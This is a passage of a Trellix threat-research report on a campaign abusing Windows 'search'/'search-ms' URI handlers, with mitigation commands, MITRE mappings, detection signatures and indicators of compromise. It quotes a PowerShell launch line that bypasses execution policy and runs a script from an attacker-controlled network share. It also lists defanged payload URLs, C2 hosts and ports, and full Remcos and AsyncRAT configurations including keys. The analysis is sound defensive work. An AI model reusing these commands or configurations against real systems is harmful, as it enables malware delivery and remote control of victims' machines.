method](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-14.jpg) Figure 14: DLL file retrieved using PROPFIND and GET method \n\n\nFor all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures. By leveraging SSL, they successfully concealed their malicious activities within encrypted traffic, effectively bypassing traditional network security controls. To shed light on the nature of this attack, the captured network traffic has been decrypted for illustrative purposes. This act of decryption allows us to analyse and understand the sophisticated techniques utilized by attackers, providing valuable insights into their strategies, and enhancing our collective knowledge in combating such threats. \n\n## An Alternative Technique: PowerShell-Based Attack Variant\n\nIn this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: \n\n * \u2018-ExecutionPolicy Bypass\u2019 to bypass the PowerShell execution policy\n * \u2018-File \\\\\\internetshortcuts[.]link@80\\ePWXBTXU\\over.ps1\u2019 to specify the path to a PowerShell script file named \u2018over.ps1\u2019 located at the given network location. \n\nThe code is designed to run the script without enforcing any execution restrictions, allowing it to execute potentially harmful commands or actions.\n\n![Figure 15: Swiftcopy LNK file execution](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-15.jpg) Figure 15: Swiftcopy LNK file execution \n\n\nDuring our investigation, we discovered multiple variants of PowerShell files in this campaign, including:\n\n * The \"over.ps1\u201d file that downloads an ISO file, extracts a DLL from it, copies the DLL to a specific directory, registers it using regsvr32.exe, and dismounts the virtual disk.\n * Variants where instead of using the ISO file, PowerShell scripts directly download DLL payload and executes it. \n * PowerShell scripts that trigger the download of a zip file containing an EXE payload.\n * PowerShell scripts that download and execute DLL files, accompanied by the opening of a decoy PDF file to deceive victims.\n * PowerShell scripts that download and execute VBS files. The VBS files execute PowerShell to inject the malicious dll into a legitimate file, accompanied by the opening of a decoy PDF file to deceive victims.\n![Figure 16: Variants of PowerShell file used in this campaign](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-16.jpg) Figure 16: Variants of PowerShell file used in this campaign \n![Figure 17: Dynamic Execution of PowerShell variant using ISO file](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-17.jpg) Figure 17: Dynamic Execution of PowerShell variant using ISO file \n\n\n## Malicious Payloads Unleashed: Remote Access Trojans in Action\n\nIn this campaign, the payloads being downloaded are remote access trojans (RATs), specifically Async RAT and Remcos RAT. RATs are malicious software that enable unauthorized individuals to gain remote control over an infected system. Once a RAT infects a target, it can perform a range of malicious activities, such as stealing sensitive information, monitoring user activity, executing commands, and even spreading to other connected devices. \n\nNotably, the EXE payload of Remcos RAT is null byte injected, a technique employed to evade detection by security products. By injecting null bytes into the executable file, the RAT can bypass security mechanisms that rely on file signatures and patterns, allowing it to operate undetected and increase its chances of successful infiltration and persistence within the compromised system. Trellix has the capability to identify and mitigate such techniques used to bypass detection.\n\n## Evading Detection: A Closer Look at the Range of Files Cunningly Utilized by Attackers\n\nDuring investigation we found that attacker adopted a proactive approach by regularly updating the files. This strategy is deliberately employed to evade detection by security products. By frequently refreshing the files, the attacker aims to circumvent security measures reliant on static signatures or known indicators of compromise.\n\n![Figure 18: Multiple html used as initial attack vector found on compromised website](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-18.jpg) Figure 18: Multiple html used as initial attack vector found on compromised website \n\n\nWe also discovered multiple file servers controlled by the attacker and these file servers served as repositories for various malicious files and tools. What was even more concerning was that some of legitimate servers lacked proper authentication measures, providing the attacker with unhindered access. This unrestricted access to servers presented a serious security risk, as the attacker could potentially exploit these weaknesses to orchestrate further attacks with relative ease.\n\n![Figure 18: Multiple html used as initial attack vector found on compromised website](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-19.jpg) Figure 19: Multiple files identified on Attacker\u2019s Server \n\n\nThe potential impact of exploitation can be enormous by utilizing this method because, the intended audience for document-based exploitation might not have a vulnerable version or they might have patched it. However, in this case, the attack was started simply by visiting the URL. \n\nDuring our research, we discovered that the \u201csearch\u201d / \u201csearch-ms\u201d protocol can be executed in multiple ways within HTML files as seen in below figure, revealing its flexibility and potential for exploitation in different scenarios. \n\n![Figure 20: Several ways of executing search query in HTML file](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-20.jpg) Figure 20: Several ways of executing search query in HTML file \n\n\nThreat actors can use the \u201csearch\u201d / \"search-ms\" URI protocol handler to launch attacks using a variety of file types. In our research, we were successfully able to utilize the protocols in different file types, including Batch, PowerShell, Visual Basic, PHP and Office Macro files. By employing this method in Script files, we observed that user would not receive Open Windows Explorer alert seen in Figure 5, thus leading to decrease in user interaction. Because of its adaptability and accessibility, it might be a tactic that other threat actors find appealing. \n\n![Figure 21: Execution of search ms query using different file types](https://www.trellix.com/en-us/img/newsroom/stories/beyond-file-search-a-novel-method-21.jpg) Figure 21: Execution of search ms query using different file types \n\n\nTo **disable \u201csearch\u201d/ \u201csearch-ms\u201d URI protocol handler**, run below command with administrative privilege: \n\n * reg delete HKEY_CLASSES_ROOT\\search /f\n * reg delete HKEY_CLASSES_ROOT\\search-ms /f\n\n## Conclusion\n\nAs the \u201csearch\u201d / \"search-ms\" URI protocol handler has emerged as a potent initial attack vector, it is crucial to anticipate a potential increase in attacks utilizing this method. It provides threat actors with a convenient means to deliver malicious payloads while evading traditional security defences. To stay safe, users must exercise caution and be wary of untrusted links. It is crucial to refrain from clicking on suspicious URLs or downloading files from unknown sources, as these actions can expose systems to malicious payloads delivered through the \u201csearch\u201d / \"search-ms\" URI protocol handler. By acknowledging the rising trend of attacks leveraging this method and taking proactive steps to mitigate risks, we can enhance our security posture and effectively safeguard against these emerging cyber threats. Together, let us remain vigilant, adaptable, and informed to combat the evolving landscape of cyber-attacks. \n\n## Trellix Product Coverage\n\nTrellix Email Security offers a multi-layered detection strategy for this campaign that includes checks on the URL, email, network, and attachment levels to ensure that any potential threat is discovered and stopped from doing harm to our customers. To remain ahead of new and changing threats, our product continuously monitors and updates its threat intelligence database to stay ahead of new and evolving threats. that includes the Trellix Multi-Vector Virtual Execution Engine, a new anti-malware core engine, machine-learning behaviour classification and AI correlation engines, real-time threat intelligence from the Trellix Dynamic Threat Intelligence (DTI) Cloud, and defences across the entire attack lifecycle to keep your organisation safer and more resilient. \n\n## Trellix Protection\n\nProduct \n\nSignature \n\nEndpoint Security (ENS) \n\nTrojan-FVIY \nHTML/Agent.s \nLNK/Agent.ab \nPDF/Phishing.u \nVBS/Agent.je \n\nEndpoint Security (HX) \n\nGeneric.Exploit.CVE-2022-30190.J.1517B09C \nGeneric.mg.163a08fb103a81ba \nGen:Variant.Mikey.148203 \nMALICIOUS FILE EXECUTION VIA SHARED STORAGE (METHODOLOGY) \nWINDOWS SEARCH PROTOCOL EXPLOITATION (METHODOLOGY) \n\nNetwork Security (NX) \nDetection as a Service \nEmail Security \nMalware Analysis \nFile Protect \n\nFEC_Downloader_HTML_Generic_31 \nFE_Loader_Win64_Generic_148 \nTrojan.Downloader \nFEC_Trojan_LNK_Generic_11 \nPhishing_JS_Downloader \nFE_Trojan_MSIL_Generic_189 \nFE_Trojan_MSIL_Generic_257 \nFE_Backdoor_MSIL_ASYNCRAT_3 \nMalicious ASYNCRAT Indicator \nMalware.Binary.lnk \nMalware.Binary.exe \nMalware.Binary.vbs \n\nHelix \n\n1.1.3858- WINDOWS METHODOLOGY [SearchNightmare - search-ms] \n\n## **MITRE ATT&CK\u00ae Techniques**\n\n**Tactic**\n\n**Technique ID**\n\n**Technique Name**\n\n**Reconnaissance**\n\n[T1589](<https://attack.mitre.org/techniques/T1589>)\n\nGather Victim Identity Information \n\n**Resource \nDevelopment**\n\n[T1586.002](<https://attack.mitre.org/techniques/T1586/002/>) \n[T1586.002](<https://attack.mitre.org/techniques/T1584/001/>)\n\nCompromise Accounts: Email Accounts \nCompromise Infrastructure: Domains \n\n**Initial Access**\n\n[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>) \n[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)\n\nSpearphishing Attachment \nSpearphishing Link \n\n**Execution**\n\n[T1204.001](<https://attack.mitre.org/techniques/T1204/001/>) \n[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>) \n[T1059.001 ](<https://attack.mitre.org/techniques/T1059/001>) \n[T1059.007](<https://attack.mitre.org/techniques/T1059/007/>) [T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) \n[T1053 ](<https://attack.mitre.org/techniques/T1053>)\n\nUser Execution: Malicious Link \nUser Execution: Malicious File \nCommand and Scripting Interpreter: \nPowerShell \nCommand and Scripting Interpreter: \nJavaScript \nSystem Binary Proxy Execution: \nRegsvr32 \nScheduled Task/Job \n\n**Persistence**\n\n[T1053 ](<https://attack.mitre.org/techniques/T1053>)\n\nScheduled Task/Job \n\n**Defense Evasion**\n\n[T1036.008](<https://attack.mitre.org/techniques/T1036/008/>) \n[T1564.003](<https://attack.mitre.org/techniques/T1564/003/>) [T1497 ](<https://attack.mitre.org/techniques/T1497>) [T1140](<https://attack.mitre.org/techniques/T1140/>) \n[T1218.010](<https://attack.mitre.org/techniques/T1218/010/>) \n[T1055](<https://attack.mitre.org/techniques/T1055>) \n[T1140](<https://attack.mitre.org/techniques/T1140/>)\n\nMasquerading: Masquerade File Type \nHide Artifacts: Hidden Window \nVirtualization/Sandbox Evasion \nDeobfuscate/Decode Files or Information \nRegsvr32 \nProcess Injection \nDeobfuscate/Decode Files or Information \n\n**Discovery**\n\n[T1012](<https://attack.mitre.org/techniques/T1012/>) \n[T1082 ](<https://attack.mitre.org/techniques/T1082>) \n[T1497 ](<https://attack.mitre.org/techniques/T1497>)\n\nQuery Registry \nSystem Information Discovery \nVirtualization/Sandbox Evasion \n\n**Command and Control**\n\n[T1571](<https://attack.mitre.org/techniques/T1571>) \n[T1071](<https://attack.mitre.org/techniques/T1071/>) \n[T1573 ](<https://attack.mitre.org/techniques/T1573>)\n\nNon-Standard Port \nApplication Layer Protocol \nEncrypted Channel \n\n## Indicators Of Compromise (IoCs):\n\n### Hashes\n\n**LNK Files**\n\n485d446c5892b931c0a3a238dca84bebb787052c877deb73f02ae5ee5632de9d \n\na2144301067495656391aaa937e47b27706d7db8ea7fd12412e7796196f91fe8 \n\n31038f7ee74463661addd7378b26076898e20d19e69f672f829af07b8ff816a9 \n\n25f616a8bce8578219bc884a64d1a3bc60ec87f07cdff8da3c386ae5b49445a9 \n\nc91527db707347d7970e8197c8a11446c40d945adfb47eb68f666b02f56d8c22 \n\nd9b56c6bf2c52116855a79e0008b6cfd7baef20e5af06ba142f774c8bf3b7401 \n\nd99ed5b55440cefd33047490937b9b729f6b7a93bcb7d3877d07391fbec2a13a \n\n1b004980738e868605f88d6b764f72d0d6c50fddea3a7bdf4508ff3057501562 \n\n83c8f1d9b27d9e455ad2602b1005f6837ac6040cf61acc3124f7179fd5894d27 \n\nb8998dff4684d815538b1c57c3bba0f9914f8436fde99ddedc1e9b1e658dabcb \n\n0b28a2dcb365ac02b7d6c3928d5a1cfdd5ed669206eb176ab65ebb6084b58545 \n\n9b5c8b82828c0aa94956671b3b9f2a6ec4f34a642d621938e86bffe9ce8b1acb \n\n2da9b5bef5ced856c6367e990dc2bf0424ad2c551016c3f1d2068b9284310e53 \n\n5be46ac9b6fd4d07db8710315b6fa8597464756005235472cf1562a0398921bf \n\ne3d4c11ea01f0b927bac052aa01e246cd2890445d848a7abe4b03882cccaaaf7 \n\n4d8ff026a14c03fc7fce40fe5bb9c287320f66102693e74e40a48247999f4a0a \n\nafff3e377a5c13a9707680ed926c15718eeb2d3b4d9dcf0993019b3766fc16aa \n\nfc226deb01a8d15acf98fd6e9daa3d95b73687f46e9029523fd7e8fe8ad5fb83 \n\nb4bded423c23574c5080f449d7c92c95b7aa480fedb756568d7280db3ec80cf0 \n\n597f58f1ec035d553dc5f5e9e0d0d0ed656a2488f5f93c30bf528278b3d615a1 \n\ned34e71d2fcae823b130a7e54a4404c15e34060e45c73654d16f34c799f91509 \n\n901dd6b7fb5aae90840191eb5e0b8e2578503feaef93fd58b99a3314a2008b4b \n\n6643aba0f5318fe279c1cae871ec32540b65265a68fb98aedae5a6fc0707b3c7 \n\n8a22b626a893ed2bcf9f63ffe5dcb2198f7d5dc991b5cec434e8b0f050ebbfeb \n\nea2c8d68c83a93b4f526d2bdb25aa20920b43b7985b9bb8a8109912b74adf1df \n\na3f5a76a50819ed856e22e690989f4e0b1bf6c88bab3d989868700cafa26c4b7 \n\n09dc1f4a21f9b36a0ceeef791d2bf3463299d172712943139ace33d476d7d7c2 \n\n5b7fdc6714e6e2f7f91a1b895204d630561f1f1431636875f6a270f3db06a55b \n\nf80caed9f1b4d71e61a2869c240206f55c44fb9075d4da283df0bcedf7a11d3a \n\n90202f38f8c813d2e09063432542573e3e7792b9111f2c56d12a451c9dd25b48 \n\n47097f706f72ac8979bfd846d779f3c520f47241b83563dbbcf0e4df94805a21 \n\nbbaf94b8be1c355328e5db962577b26ae73f9c3fbf81e6892019bffbf0513698 \n\nd626716fe7b26f3299438cca864216c3dacadaba145ce2decc2eededb3d4bf38 \n\n40f99a875efa382cc0cae003c7b3b0519a7fcaa10a95989103b1e3e2bb20832a \n\n52cebb58ec92cf411ea8482502d8aea3580ded02edc1482609283e0dff541dec \n\n437b82a5533485ce26a8b983cffa787e629120422e49b28a2608337158c883fc \n\n84d9b5159f937e5f1c98e221d23546fb38775097e983fb660144b4d4a8955582 \n\nc519d06e252a1cf04f8fb38f20c76a39363e51bf31864bac638f662a698b244e \n\n5d7e304d77bedb970a1c9a5b3aa6f5c4252825c9c0a94fe60ec56a0f1b2664b5 \n\n1598486e69f94e221dcbd02b10bb33352baf5886db9c06475470159ab16eadbd \n\n923c2a87d2321c3fb172d8998574f4d2695e6c8f5f5d5d568c26aefb5fe2d198 \n\na531edd712eb0beabe14cb4e9ff91dc7635b743e71b6fdc20ec4c0247eccff62 \n\n7c1aa45ce5d254ffaefea8396128a55318bf937fbb3400b327f5dc528134730d \n\nf4b055a61d096e2f111bdaf7b171719188c02d74fa946dabdae0bbc72671d2db \n\n58addf5e77b1dd45ead377c2a8d52b12a0db4edbc607f17b650c27428e24bbfd \n\n964f9489714241afd3c422eb164fe96dfe72c12ab1d3f58613694f73bc7e839e \n\n5a47b18066d8dcd0fbc524f529002cf0a270d8394de928e8426fa06959a82704 \n\n388f736c54cb1e57d5877d35da5ecdcf46b88ad2e44ca5d2ecffa0dcf0e1b8d9 \n\n4daafeb8ae95460be3ef93577983db33cca28ecb67fff9b958a7f71ae17504bf \n\n**DLL Files**\n\nd6fcf0bcebcac7aa5e7b21b189dbd89f314f79871b770911a7d7b780207fb83d \n\nd0b0f7842587afe7e23fc0218fd0a391996e72b1a804a6bfc33e97d9aecb6b2e \n\nf21010eb8c0f2fd23c4ee941a394853597bfb90527f43f3c61bf6ce004b7f367 \n\na9f132dc514d4598a29d004a38e71d3a389e43b46149a36314d2f55e20e1ebb6 \n\nfad17294a3fd687d75f49040c837af39ca2bb9ea84e022aa750e81ddc4cd1583 \n\n811bba52ccee8ee0dce9f96f402a7c33427622276028bfb5e9d661130fa0e3fc \n\n45cd3d4ec91bf68bc975d99d90612e459aeb4a0f31321a440d7d41fcdea798f3 \n\n72a79351d602ce6a1d0267bcd6d57c17cd8adc44c78197138cc3be5f4100b5b6 \n\nb5b3747f8b0d11b5217a7a39c2420fb5a0c1044c82cbe9cba596dacf521a1a01 \n\n19e75218473b112e65cec4c2c5afd0c3cc6b4fb8f847127018e0815bd64b6480 \n\nfe6a8beb35f9550615cb3190b1b207bbe11c23a16248644c09ba0d007822c132 \n\nf493a5a65d460bd53b05fde1ee5562db08e52c34989321a9bd09ecc5dc3f4d6d \n\n41960d1cd749289ff40a1c92970706ead76f73fb3b61276a2f34a7ac38f989c6 \n\nde0a1c35121a6e08bf07267aca78fb8fe9c46ead95ed1acebfb3a77b72e869b8 \n\nf80553b2b50775cdad4c40529b4fb9461b1758a6007edd7c22df09238885201 \n\n3dfc781c1b656925b91a22b48b85b6ce2bf8f9cb9c1288be6ec3b760f6f7402d \n\n188baeb6bf2b009adc2efb648b068be71d5b55d1d11e000c473b429f3dda4a86 \n\nf2c577360fbf36859eeb194970f734810f2954493e5428d71add4edb6c11c4f1 \n\n15f8dd0880d76be36de65dd8412d7171d2cc00c35d3461452dfdae2f657aaf31 \n\n2b84ab32982a3f9cc03dd4f020751dcaaf8ad5ef32d0e7975a0b1d17045ee07e \n\n7316651d2e38599d6e46a1ac52dff4eee7ae16f22e87cd244efb9a6ed748f358 \n\n0764a24f94d829a625cca37f92863a84553db77469b68eadf875e73fcf0d3036 \n\n**HTML Files**\n\n9851dbd8a7e9b52e6745b7fb2ff854ce573d4a56be0cd0b700a30eca15e331e5 \n\n**PDF Files**\n\nbd33b3aa897df0702913dbecd5ad2f7e63df11f4c2a7e461dad7f89abe218a45 \n\n540744100c8a0eba6c4d24fcee5df40a274ecd51f33c41e11dbe482bd32d271d \n\n7a69202cb54dd828736d63dae6b948fcef815658859f1d10220727d242eb6fd4 \n\n776d7ce582c1e3af65b60073986c78da394cbbab1bf6b83a6c0d736c58d33758 \n\n1c450bca78ecf77fc5c9b03ced93f5410f03804fcbf17c9c5e584770eec03403 \n\nb26144c6e42601f1f1be09ece7c7fcb127637db3b953065648d1b1f371da7e8a \n\nf0f932c136c2d34b0f9da7a83e1a2f87063ea2bce48d3a9af004189bf49d98d9 \n\n98ab2fc44063d4e00f221e502419d9cca598fafb9e1e00352149327267604bc1 \n\n6e7f4d594ee4f5d5f08321ede7c32e51d72acbd0700f37c621f9145d8c86309d \n\n904343ba2502d390b36403181e77192a62f31e98c87eb91906fbae27019b4c0d \n\n3d87877bfb6da476da1f51410416bef22cc216d941c79268f6de17d8dde1c0b8 \n\n**Powershell Script**\n\nc2f10c9556eecd1ffe67e763190c630262dfdb593245357283b02df2b4d696de \n\n5c31f5cfa003b1f745eb5019d76aa43f06a7d46c6403eeb2deabd44ee1a1a97a \n\n4c1cb32e0a142d55997a55bfc239e4b5b31a6e021014d023d5ff9787948490df \n\n4f8ba8eec38e117fa323bc24074993a7f1cc31c5ce112f9c6696c724628f53dc \n\ndd28b5740c0fb2890a7579d75c65cf09a36ba5d9fc5df5c9581771e40420f35b \n\n56a2692cbde566ca149ef196f9bf4f843839f36ebfdb8acd47acaf2cd01703e9 \n\n9466d718154c26b8d003b99faff2a8868e2a26788e2946b68245e6dfe54da610 \n\nc1cae7181fab03d16c8e10dbe0993319dca6597e2a2f28ba07014d64f996a1fa \n\nce3cfcc3cd86936aff5d43de6f0298cc8f0c5cfd7675d951dd23de53c3b8b154 \n\nc8c5386fef1b6e45e02323f3a45b1e73b5d5be60a8a5f5ebe3b95bce77b03167 \n\n88aeb09dcc59858c9969b7ae1e0e2b58f0aa90b2d27a5edfe9cd82e602ed5952 \n\n**VBS File**\n\nf214a42d57e88b6d77b036934cf93fb9c9126335925bdafc9bb8a326abe2d652 \n\n4867eebb0f6bca553c7d50e878e3cb19f7471c1c89cbd85f49b6d50f7a44e779 \n\n**ISO File**\n\ncef2c8a040fe4d27843f601b76c13169fcc0f1d5c7f20e71e830967dffa89baa \n\n**ZIP File**\n\nc7bdce98567809f96907d5a005ae7ff8295c63b9d93aa2a9846f903d688fd657 \n\n**EXE File**\n\n19cd76a94c55380cc6b053b05eb8896fa1329f03d65a7937225196c356bb0c6a \n\n**ASYNCRAT From Memory**\n\ndb27ba01238ce49683b68bc9c2b925caac6008ae178d14c0dce4cce161bde746 \n\n### Domain/Host/URLs\n\ndhqidgnmst61lc8gboy0qu4[.]webdav[.]drivehq[.]com \n\ndhqidlu10mna2tuk2qfoaew[.]webdav[.]drivehq[.]com \n\ndhqid9pjapv63d8xvji8g4s[.]webdav[.]drivehq[.]com \n\ndhqidvjn6bfvi00cb0834a3[.]webdav[.]drivehq[.]com \n\ndhqidvdosqx8tu0vq1h1d1g[.]webdav[.]drivehq[.]com \n\ndhqidctjo3ugevk9u5sev1r[.]webdav[.]drivehq[.]com \n\ndhqido7gy8hiehwprjhli16[.]webdav[.]drivehq[.]com \n\ndhqidfvyxawy0du9akl2ium[.]webdav[.]drivehq[.]com \n\ndhqidee98lja03f52atdmii[.]webdav[.]drivehq[.]com \n\ndhqid5neul4wc9w74pynlrs[.]webdav[.]drivehq[.]com \n\ndhqidqot3k8sh7ve2ns9nry[.]webdav[.]drivehq[.]com \n\ndhqidoakoljbb9jnbssiau2[.]webdav[.]drivehq[.]com \n\ndhqidlnsxx2qigisdvn7x2f[.]webdav[.]drivehq[.]com \n\ndhqidwhws4rkw80f312lkpm[.]webdav[.]drivehq[.]com \n\ndhqidhhva53s2qvmxwxtkrm[.]webdav[.]drivehq[.]com \n\ndhqid3b4b9u6ecv6jcxva0f[.]webdav[.]drivehq[.]com \n\ndhqid45r064utd5gygt2jy6[.]webdav[.]drivehq[.]com \n\ndhqidhx2c2f2oc8lccg38tx[.]webdav[.]drivehq[.]com \n\ndhqidvooruijtwg0lyucl5s[.]webdav[.]drivehq[.]com \n\ndhqidk9oi3yuhf43sb05xgn[.]webdav[.]drivehq[.]com \n\nbalkancelikdovme[.]com \n\npdf-readonline[.]website \n\nhxxps://designwebexpress[.]com/Invoice_3211.html \n\nhxxps://designwebexpress[.]com/Invoice[.]html \n\nhxxps://designwebexpress[.]com/Invoice_3221[.]html \n\nhxxps://designwebexpress[.]com/Invoice_4221[.]html \n\nhxxps://transfer[.]sh/get/Ja9CVWbDzf/invoice[.]zip \n\nhxxp://internetshortcuts[.]link/VdXiIRQo/payload[.]iso \n\nhxxps://efghij[.]za[.]com/Invoice_662243[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/EX \n\nhxxps://efghij[.]za[.]com/Invoice_898277[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/EX/index[.]html \n\nhxxps://www[.]cttuae[.]com/ems/page[.]html \n\nhxxps://chemaxes[.]com/Invoice-Payment[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_82637[.]html \n\nhxxps://reasypay[.]sa[.]com/Invoice5691[.]html \n\nhxxps://lfomessi[.]za[.]com/home[.]html \n\nhxxp://172[.]245[.]244[.]118/home[.]html \n\nhxxp://172[.]245[.]244[.]118/Quote[.]html \n\nhxxps://cargopattern[.]shop/page[.]html \n\nhxxps://efghij[.]za[.]com/Invoice_72638[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_898277[.]html \n\nhxxps://fashionstylist[.]za[.]com/Invoice_0020317[.]html \n\nhxxps://landtours[.]rs/BB/index[.]html \n\nhxxps://www[.]shorturl[.]at/asAFO \n\nhxxps://shorturl[.]at/asAFO \n\nhxxps://cargopattern[.]shop/home/home[.]html \n\nhxxps://bridgefieldapartmentsapp[.]ie/home[.]html \n\nhxxps://designwebexpress[.]com/Invoice_6211[.]html \n\nhxxps://designwebexpress[.]com/Invoice_5221[.]html \n\nhxxp://seductivewomen[.]co[.]uk/invoice44201[.]html \n\n### Remcos Configuration\n\nHosts: gainesboro[.]duckdns[.]org:30277 \n\nBotnet: QB-1 \n\nConnect_interval: 1 \n\nInstall_flag: False \n\nInstall_HKCU\\\\\\Run: True \n\nInstall_HKLM\\\\\\Run: True \n\nInstall_HKLM\\\\\\Explorer\\\\\\Run: 1 \n\nInstall_HKLM\\\\\\Winlogon\\\\\\Shell: 0 \n\nSetup_path: %LOCALAPPDATA% \n\nCopy_file: remcos.exe \n\nStartup_value: True \n\nHide_file: False \n\nMutex_name: pqowndhk-KEQR6K \n\nKeylog_flag: 1 \n\nKeylog_path: %LOCALAPPDATA% \n\nKeylog_file: logs.dat \n\nKeylog_crypt: False \n\nHide_keylog: False \n\nScreenshot_flag: False \n\nScreenshot_time: 5 \n\nTake_Screenshot: True \n\nMouse_option: False \n\nDelete_file: False \n\nAudio_record_time: 5 \n\nAudio_path: %ProgramFiles% \n\nConnect_delay: 0 \n\nCopy_dir: Remcos \n\nKeylog_dir: Mozila \n\n### AsyncRAT Configuration\n\nC2 \n\n79.110.49.162, 111.90.150.186 \n\nPorts \n\n6606,7707,8808, 8753,8977,9907 \n\nBotnet \n\nDefault \n\nVersion \n\n0.5.7B \n\nAutoRun \n\nfalse \n\nMutex \n\nAsyncMutex_6SI8OkPnk \n\nInstallFolder \n\n%AppData% \n\nBSoD \n\nfalse \n\nAntiVM \n\nfalse \n\nCert1 \n\nMIIE8jCCAtqgAwIBAgIQAI5BDBpeCTNsOSTXCKCKpTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjMwNjI0MDAxODQ4WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBALa46FJI8u/4jUwxfEcHQEDPGroGAEzlJsx1nSk5/L2JCWHSqdWOhEtoUMp1QsLxbTaq5IiN28rGy/6oOxzAmxyk1lK+z/haGBu3w9ae8JAsgAM2v2ClGBL67/lgeO7h5AYeCUpxitXGTCdhnMyeR9O+g94lidCbp6Y/Rbj3Wdu5nzSURFEPdkW3t6/jAVdRH+VuFqmOs0SSe71W+J1Ltnby65MkMb0p2q0BZV8YhSEsSD+yC/ilOdyCKLa70PXyl25vPmV0+VZxV/gOZY+wdsMHJiBvRX+fGuLRNK0Ti8J7yZMONPGS/NmhwkE4Kx/WMvC1Af1syI/2u1cbLRrna/NtPejXgpzz9TV5B04pWbLpT4BV6MgUsjkV4akmXEf6mK+veI2FjVdmCWpujmppt5WG40ay1y8YRJD/QxHfMbqJocFp+9jRGamhXAAj2PQK63GA8Iz9OCzggD0tqG01Wz90z70ooIz2DrHETXSzgpgTRwbTJG4KmwZTWUUTEXXZsJhKBOOWDaqazbA3wxxea6vdXsx2wpf82LFliEpFdMdDHNEiblpLYWD1dtEw4ehIcMpZUm/Ua4DB/OGlARm/NA+/TBxemlcfgblyPVxBn++f+mkoHHW5+0Or9SqMhY/74s8zgOFYp1cTZG97ZD5jgaNVrFPHFUtnZPfLTV8BG/mRAgMBAAGjMjAwMB0GA1UdDgQWBBScePgUNtG8SPP55ahFlKPcwH7PuTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBKbdjP6gzZShADcF6siolFE0OpO+vWwVSOdKv/lMxW4mscBZhHZeCrwe3tZjGW3HTAx2wZikSU3SjC9XL/Ei/FqIvP5WubvtshCGMuXIf4aQkkWtzq0Ts1J0XZLtC6fKCoilYq0rNrTn6PRuOnwY4sTN0MlULtZJu1PqRP9YeFWYwMzwZ02FalqnjkOSQ/1y5j11P7SSnJTPNk2/+5Sba0b8qlVPj0CZ7kPxwNqKAOOyC5Q4sqCvS7F7W91WLif7l6PjDoDqk3bdFvrvT7bIFew7o1ZjORYpq+iOPdoybFkyawSEtVgxeJUQ/tV+qM72avws7BugxxVNL4ZCYb69e4spdSH1rwf8w40l4fBMJ5HhFS3erEbRij8FmbSK/78miQaimrSqiS0FG+kFm1paOWdIsZYYhR8sq/ALccUG5ju3cI9q46gt5hIk66TY8LMJtzQc2tyMsge3lodnl9l66Fo1HuW5tgSQ5ntx/Fog9G6qYFvCHsGH7FMkwCMppiyYoYa4+TghvqSmeaCurjjIYex/GXFMOTyU7lmPDfDpZpTMEU54qw19A95T0O49DIzN5U7I8OGdm5/uCBSvaK33KzwTfxgfROQbZR8ZJ/Rm5RBbz6HdAk1io2Bu9+S0VKXPMzcYguSQ8sLJt+G6W3HbAtYWM9DOFlR2ajiW/ULKq9QA== \n\nServer_Signature: \n\nWgJ3rQ4t6UJG3q/lXzUo9RAADSp1m2PQaonNWi20VF+auR3rkxQXV4g3j7IPQ4OxCclMC5/vYgPpfMIl+RezYETzQIx0qXIYeSnHznrm76WiZMYgsxHkFxPySIJW1f2IzUpEyrdONzhg/odXNBRAjmi5L4E94xI4keXiMaa9D0K4uOBMAuPslJ1wbHiuVKf3wgqu8G809j1jWTmRJ4/kYjsh63+qjyhRTTC1xgqqaMhCndEcHvlHR+nBifGpL3NQM2iyE9RJCc48w55txTcqUZkX9dhab0XZy3iH6v73+lwdB+Y7O2zSXU+lboTiKkarnRx4BvCZUZNuI/JBm3A+KlJvEyqCq8Cg3oUpGv3zxavhHYv2VJXs4DrDFJoNGnhsrDAUARMWjfQ/skPd8QGkf8PfcZJaNmAeTpLbNt8DKe9ZmA5q7mfSp7S6lk8WNxu4+ayK6GRBSN3p4NgtLo85o66Ivowo5jvOVB3iwDPptxs2fgehFqgORY19hbhmoJ3BEMsYOLSgtUSAhuFg4HvCYEQh/LxPnxpH17QMAlyl0Xb/+JoycFyX1rIyegk4q2BIClYeFbFZEsa7qTOWQl32J0urav1WmwGV3ezc7oeaH6AkrTJLTFqePt2FUP7LoBzAb4Fv2RtNkR/bov6WdrNwQO/Di/idBmI7wQFmSzYhs28= \n\nAES: \n\n02630f7bfb8bafcd79ec1c49e1d7184c15d03f662e520f6ee201ae7cd14247e6 \n\nSalt: \n\nbfeb1e56fbcd973bb219022430a57843003d5644d21e62b9d4f180e7e6c33941 \n\n_ This document and the information contained herein describes computer security research for educational purposes only and the convenience of Trellix customers. _\n", "cvss3": {}, "published": "2023-07-26T00:00:00", "type": "trellix", "title": "Beyond File Search: A Novel Method", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-26T00:00:00", "id": "TRELLIX:FC79F74B85714DFB2F725665CE9B700F", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 